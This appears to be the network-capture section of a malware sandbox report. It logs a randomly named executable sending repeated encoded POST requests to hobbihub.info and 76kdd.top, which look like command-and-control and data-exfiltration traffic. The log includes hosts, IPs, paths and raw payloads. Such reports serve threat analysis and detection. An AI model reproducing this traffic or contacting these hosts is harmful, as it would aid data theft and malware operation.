                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US
                                                    Host: www.tals.xyz
                                                    Connection: close
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Nov 21, 2024 16:18:41.990622997 CET412INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Thu, 21 Nov 2024 15:18:41 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 272
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 7a 66 49 3d 6a 58 45 44 65 56 34 58 70 36 32 26 53 74 57 58 46 30 4a 78 3d 69 6d 50 6d 66 34 67 49 31 73 72 6a 34 53 54 55 72 72 4d 71 4e 62 67 7a 53 33 6e 64 4f 32 56 66 7a 64 31 38 65 6a 6c 45 46 61 56 61 34 4a 53 55 6b 6f 48 4a 33 6c 38 36 4b 4b 4f 4f 76 61 2b 37 53 57 4c 51 72 73 76 73 6c 6e 66 34 66 6f 66 43 52 58 46 41 6c 73 65 4f 43 57 42 47 6d 74 6b 58 6b 6c 6e 6e 4a 61 31 49 4e 71 6e 43 71 39 4e 67 4e 34 6c 55 4e 46 45 79 48 4b 67 31 78 66 6b 37 6d 67 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?zfI=jXEDeV4Xp62&StWXF0Jx=imPmf4gI1srj4STUrrMqNbgzS3ndO2Vfzd18ejlEFaVa4JSUkoHJ3l86KKOOva+7SWLQrsvslnf4fofCRXFAlseOCWBGmtkXklnnJa1INqnCq9NgN4lUNFEyHKg1xfk7mg=="}</script></head></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    17192.168.2.549993209.74.77.108806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:18:47.799268961 CET786OUTPOST /i5gf/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.hobbihub.info
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Origin: http://www.hobbihub.info
                                                    Referer: http://www.hobbihub.info/i5gf/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 57 37 73 68 36 48 76 56 36 51 48 70 34 79 6e 2b 72 76 5a 6f 78 79 31 65 42 75 74 36 30 4e 73 59 56 64 35 4a 61 49 58 4e 33 64 55 52 74 2b 62 2b 57 4f 52 66 51 4e 65 68 76 69 53 67 56 33 7a 74 66 4f 41 2f 79 6d 6e 63 76 2b 58 4c 4c 66 78 52 78 43 55 6f 64 35 50 75 43 4a 41 56 35 76 68 54 58 48 72 44 62 61 57 42 39 57 73 45 4e 6e 4b 6f 43 2b 6b 73 41 63 78 33 52 61 70 50 57 73 73 72 35 69 37 70 43 49 47 51 32 61 6b 54 30 53 53 46 67 48 7a 49 4f 30 67 43 33 32 2b 50 6c 47 41 76 34 6a 51 68 78 44 42 50 5a 76 55 38 59 6e 79 4f 4b 68 51 2b 42 79 37 68 2f 32 54 53 32 6e 2f 35 45 79 71 59 2f 54 6f 3d
                                                    Data Ascii: StWXF0Jx=W7sh6HvV6QHp4yn+rvZoxy1eBut60NsYVd5JaIXN3dURt+b+WORfQNehviSgV3ztfOA/ymncv+XLLfxRxCUod5PuCJAV5vhTXHrDbaWB9WsENnKoC+ksAcx3RapPWssr5i7pCIGQ2akT0SSFgHzIO0gC32+PlGAv4jQhxDBPZvU8YnyOKhQ+By7h/2TS2n/5EyqY/To=
                                                    Nov 21, 2024 16:18:49.052392006 CET533INHTTP/1.1 404 Not Found
                                                    Date: Thu, 21 Nov 2024 15:18:48 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    18192.168.2.549994209.74.77.108806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:18:50.468961000 CET806OUTPOST /i5gf/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.hobbihub.info
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Origin: http://www.hobbihub.info
                                                    Referer: http://www.hobbihub.info/i5gf/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 57 37 73 68 36 48 76 56 36 51 48 70 36 52 2f 2b 70 4d 78 6f 77 53 31 52 4f 4f 74 36 68 39 73 55 56 64 31 4a 61 4a 44 6a 30 72 45 52 73 62 66 2b 58 4d 70 66 64 74 65 68 38 69 54 71 4e 58 7a 6d 66 4f 64 43 79 6b 6a 63 76 36 2f 4c 4c 63 6c 52 78 52 38 72 63 70 50 6f 63 70 41 74 6d 2f 68 54 58 48 72 44 62 61 44 75 39 57 30 45 4e 33 36 6f 41 66 6b 6a 4a 38 78 30 57 61 70 50 41 73 73 76 35 69 37 50 43 4a 61 2b 32 65 55 54 30 53 43 46 68 57 7a 50 48 30 68 4c 70 47 2f 74 31 6e 6c 39 30 41 51 41 78 43 4e 53 5a 2b 6f 38 51 78 44 6b 51 44 59 57 53 53 58 5a 76 6c 62 6c 6e 58 65 51 65 52 36 6f 68 45 39 75 48 5a 55 7a 53 59 4b 74 75 70 4d 62 35 32 6e 37 72 48 34 68
                                                    Data Ascii: StWXF0Jx=W7sh6HvV6QHp6R/+pMxowS1ROOt6h9sUVd1JaJDj0rERsbf+XMpfdteh8iTqNXzmfOdCykjcv6/LLclRxR8rcpPocpAtm/hTXHrDbaDu9W0EN36oAfkjJ8x0WapPAssv5i7PCJa+2eUT0SCFhWzPH0hLpG/t1nl90AQAxCNSZ+o8QxDkQDYWSSXZvlblnXeQeR6ohE9uHZUzSYKtupMb52n7rH4h
                                                    Nov 21, 2024 16:18:51.737951040 CET533INHTTP/1.1 404 Not Found
                                                    Date: Thu, 21 Nov 2024 15:18:51 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    19192.168.2.549995209.74.77.108806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:18:53.126828909 CET1823OUTPOST /i5gf/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.hobbihub.info
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Origin: http://www.hobbihub.info
                                                    Referer: http://www.hobbihub.info/i5gf/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 57 37 73 68 36 48 76 56 36 51 48 70 36 52 2f 2b 70 4d 78 6f 77 53 31 52 4f 4f 74 36 68 39 73 55 56 64 31 4a 61 4a 44 6a 30 72 4d 52 73 70 58 2b 58 74 70 66 63 74 65 68 6e 43 54 6e 4e 58 7a 33 66 4f 56 47 79 6b 75 68 76 38 37 4c 45 65 39 52 68 77 38 72 53 5a 50 6f 47 4a 41 57 35 76 68 6a 58 44 48 50 62 61 54 75 39 57 30 45 4e 78 2b 6f 4f 65 6b 6a 46 63 78 33 52 61 70 44 57 73 73 48 35 68 4c 78 43 4a 65 41 32 74 63 54 30 79 79 46 6d 6b 62 50 66 6b 68 4a 6f 47 2f 4c 31 6e 59 6a 30 41 4d 79 78 43 34 61 5a 35 45 38 41 6e 6a 6e 43 51 59 4e 45 43 62 70 69 6b 66 5a 6d 52 43 31 57 43 4f 69 72 6e 52 6f 43 4c 55 39 58 73 50 76 74 72 4a 58 76 48 76 4e 37 68 42 74 70 59 67 45 45 70 76 61 70 4c 71 76 6c 45 42 76 4c 35 6b 51 57 54 47 6d 38 49 70 6f 73 78 59 6f 42 64 50 4e 70 6b 76 62 2b 55 67 72 6c 6f 78 66 6a 43 46 73 42 39 2f 46 36 4b 78 58 42 73 67 42 47 72 6f 4f 63 36 53 73 57 42 73 33 50 42 6f 6e 56 50 64 47 6a 56 62 57 65 41 49 42 58 54 48 66 6d 66 38 4d 42 63 56 59 6b 54 49 52 7a [TRUNCATED]
                                                    Data Ascii: StWXF0Jx=W7sh6HvV6QHp6R/+pMxowS1ROOt6h9sUVd1JaJDj0rMRspX+XtpfctehnCTnNXz3fOVGykuhv87LEe9Rhw8rSZPoGJAW5vhjXDHPbaTu9W0ENx+oOekjFcx3RapDWssH5hLxCJeA2tcT0yyFmkbPfkhJoG/L1nYj0AMyxC4aZ5E8AnjnCQYNECbpikfZmRC1WCOirnRoCLU9XsPvtrJXvHvN7hBtpYgEEpvapLqvlEBvL5kQWTGm8IposxYoBdPNpkvb+UgrloxfjCFsB9/F6KxXBsgBGroOc6SsWBs3PBonVPdGjVbWeAIBXTHfmf8MBcVYkTIRzSsXqz6ikAe5JeBIPy5qQqGVG5jljMEV4/xYtNNU2s4n4ZD/ASXJyi8edtdEKOkzePJzXNtd8CSsq5BI6K6c85La8oafTcU0hQ5dvlvN5FBj56Mn9PdyulohVmkRkhYIk8CVCfvIhy7HJMkpccRVW6da07qO0HcdQDMYaA6RF5V+4Xed5rNLQpXKv0np8GUphMfkeZGsQBcKLM1LzJRtYfyVklo18FBNnvBSukDva06XZAcHG842pRMZXaOb3JU+AlIuk013GVN+6bCcKdOW2MVjBlezskgS5QfptxrSUegy5byS8oBAjezA9lzqXPxqH2WYKlfd/ak9LyjWrNI79YV82Z8GRytJKMRTJKQBmVuMptcWuZF7+0LOLMc1+xTpuGgpUBrLI4FWcqPPYhZBsn53FOnm9gnETbJZr7g7mKtTQNDL1Z5gLvJTwIOOoL7b9u3uwQn6UYS24mFTZywbAciXv9xtqAfA1HpLrZKiQy4j2ihcak8rdnn1Z5lUvgah9DlajfUO5LElSAui2KzZwlZtTEcdUSLP7Tik3kiBtYV4KLQ4bsmot83a9AwKuiEwwhGrzCQBZEPjzWkic3K3OFr9uGEz1SwkHMoJOq7154r/JY/cIfSiW6ZshwEB7jPZ1xxX/nQsx8vC6FCoTsIBEzrcVDILlNicT5d [TRUNCATED]
                                                    Nov 21, 2024 16:18:54.456902027 CET533INHTTP/1.1 404 Not Found
                                                    Date: Thu, 21 Nov 2024 15:18:54 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    20192.168.2.549996209.74.77.108806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:18:55.777929068 CET528OUTGET /i5gf/?StWXF0Jx=b5EB5wzy9Ffpgxi54+1Z/hpFI4wOrvBGEdwPVoWw9aB094XdY8Z4QvLyijfbNXTXb/o83TjYq8/0I5ZRzCl+Qa/gFZ4gxutURWfxeLyMh3oNbVjBJMQVGcVSIottQNNDqQ==&zfI=jXEDeV4Xp62 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US
                                                    Host: www.hobbihub.info
                                                    Connection: close
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Nov 21, 2024 16:18:57.058135986 CET548INHTTP/1.1 404 Not Found
                                                    Date: Thu, 21 Nov 2024 15:18:56 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    21192.168.2.54999738.47.232.194806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:19:03.172666073 CET774OUTPOST /6rpr/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.76kdd.top
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Origin: http://www.76kdd.top
                                                    Referer: http://www.76kdd.top/6rpr/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 5a 34 67 74 61 6c 39 44 39 6d 75 54 79 72 61 4a 50 33 55 2b 72 59 74 78 39 59 7a 43 4f 49 30 2b 63 39 4f 2f 63 46 59 32 58 68 33 53 6a 33 64 49 58 30 45 4c 2b 4c 63 63 38 6d 6b 69 61 47 44 4a 54 62 31 72 32 58 33 68 5a 76 64 43 66 39 70 55 39 35 55 4d 47 2f 4a 52 6a 67 45 57 54 68 44 69 6c 52 48 7a 2f 4d 39 4d 79 4e 79 41 78 71 46 51 73 4c 6b 51 7a 57 47 5a 2b 4e 51 6a 68 37 51 66 45 4a 6d 68 41 33 54 35 6e 54 75 36 45 57 6f 48 38 57 6a 50 4b 48 44 56 30 4d 72 57 2b 4e 2f 6a 49 41 34 6a 45 71 63 66 45 33 70 48 42 30 75 44 78 68 41 67 33 63 76 68 46 64 4e 30 39 36 42 72 39 47 45 31 30 45 77 3d
                                                    Data Ascii: StWXF0Jx=Z4gtal9D9muTyraJP3U+rYtx9YzCOI0+c9O/cFY2Xh3Sj3dIX0EL+Lcc8mkiaGDJTb1r2X3hZvdCf9pU95UMG/JRjgEWThDilRHz/M9MyNyAxqFQsLkQzWGZ+NQjh7QfEJmhA3T5nTu6EWoH8WjPKHDV0MrW+N/jIA4jEqcfE3pHB0uDxhAg3cvhFdN096Br9GE10Ew=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    22192.168.2.54999838.47.232.194806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:19:05.832386971 CET794OUTPOST /6rpr/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.76kdd.top
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Origin: http://www.76kdd.top
                                                    Referer: http://www.76kdd.top/6rpr/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 5a 34 67 74 61 6c 39 44 39 6d 75 54 67 61 4b 4a 4e 55 73 2b 36 6f 74 77 6a 49 7a 43 45 6f 30 6c 63 39 53 2f 63 42 42 7a 58 54 44 53 6a 57 74 49 57 32 73 4c 7a 72 63 63 7a 47 6b 72 55 6d 44 53 54 62 35 56 32 57 4c 68 5a 76 5a 43 66 38 5a 55 39 4b 38 44 58 2f 4a 58 32 51 45 55 58 68 44 69 6c 52 48 7a 2f 50 41 6a 79 4e 36 41 32 61 31 51 76 75 45 66 39 32 47 47 32 74 51 6a 6c 37 51 54 45 4a 6d 54 41 79 7a 54 6e 56 69 36 45 54 73 48 2f 45 62 4f 41 48 44 70 72 63 72 45 31 2b 43 62 48 42 77 45 48 34 64 67 62 30 77 37 45 43 66 70 72 44 49 49 6b 38 44 5a 56 4f 46 44 73 4b 67 43 6e 6c 55 46 71 54 6e 50 4b 79 53 35 37 6e 51 72 73 57 43 63 57 6c 4b 55 2f 38 4b 72
                                                    Data Ascii: StWXF0Jx=Z4gtal9D9muTgaKJNUs+6otwjIzCEo0lc9S/cBBzXTDSjWtIW2sLzrcczGkrUmDSTb5V2WLhZvZCf8ZU9K8DX/JX2QEUXhDilRHz/PAjyN6A2a1QvuEf92GG2tQjl7QTEJmTAyzTnVi6ETsH/EbOAHDprcrE1+CbHBwEH4dgb0w7ECfprDIIk8DZVOFDsKgCnlUFqTnPKyS57nQrsWCcWlKU/8Kr


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    23192.168.2.54999938.47.232.194806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:19:08.506819963 CET1811OUTPOST /6rpr/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.76kdd.top
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Origin: http://www.76kdd.top
                                                    Referer: http://www.76kdd.top/6rpr/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 5a 34 67 74 61 6c 39 44 39 6d 75 54 67 61 4b 4a 4e 55 73 2b 36 6f 74 77 6a 49 7a 43 45 6f 30 6c 63 39 53 2f 63 42 42 7a 58 54 37 53 6a 6c 31 49 57 58 73 4c 79 72 63 63 74 32 6b 75 55 6d 43 51 54 62 68 52 32 57 48 58 5a 74 78 43 46 61 4e 55 71 4c 38 44 4f 76 4a 58 30 51 45 56 54 68 43 69 6c 56 62 33 2f 4d 34 6a 79 4e 36 41 32 59 64 51 35 4c 6b 66 2f 32 47 5a 2b 4e 51 6e 68 37 51 2f 45 4a 2f 6d 41 79 2f 70 6b 6c 43 36 64 7a 63 48 35 78 50 4f 44 6e 44 52 71 63 71 58 31 2b 4f 45 48 42 38 66 48 35 70 61 62 30 49 37 48 7a 7a 7a 36 33 34 4d 32 73 62 31 56 66 63 6a 31 39 56 67 6d 55 63 6b 6c 42 72 4c 4f 52 79 42 30 43 41 70 6f 44 72 48 49 42 36 76 77 5a 72 33 34 2b 2f 5a 4f 30 69 72 61 32 6c 45 79 61 64 32 61 34 73 36 6f 2b 41 49 34 46 61 74 37 4f 71 77 69 73 59 4f 72 79 4f 38 6d 31 70 70 69 4c 4e 45 6e 39 6f 57 6b 72 39 79 67 31 4f 62 78 38 36 32 6f 64 33 35 7a 56 36 48 74 33 73 35 76 6b 42 64 46 74 68 6a 65 42 78 47 46 4e 58 4e 42 38 61 52 6e 6a 76 50 7a 64 50 61 76 73 73 32 4d [TRUNCATED]
